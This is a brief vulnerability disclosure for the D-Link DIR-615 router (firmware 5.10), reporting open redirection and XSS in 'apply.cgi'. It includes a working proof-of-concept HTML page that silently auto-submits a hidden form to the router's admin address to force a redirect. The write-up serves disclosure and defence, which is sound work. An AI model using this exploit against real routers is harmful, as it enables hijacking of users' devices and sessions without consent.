D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10
The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.
Open Redirection
apply.cgi
<html> <!-- @OsandaMalith --> <body> <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit"> <input type="hidden" name="html_response_page" value="https://google.lk" /> <input type="hidden" name="html_response_return_page" value="tools_vct.asp" /> <img src=x onerror="exploit.submit()"/> </form> </body> </html>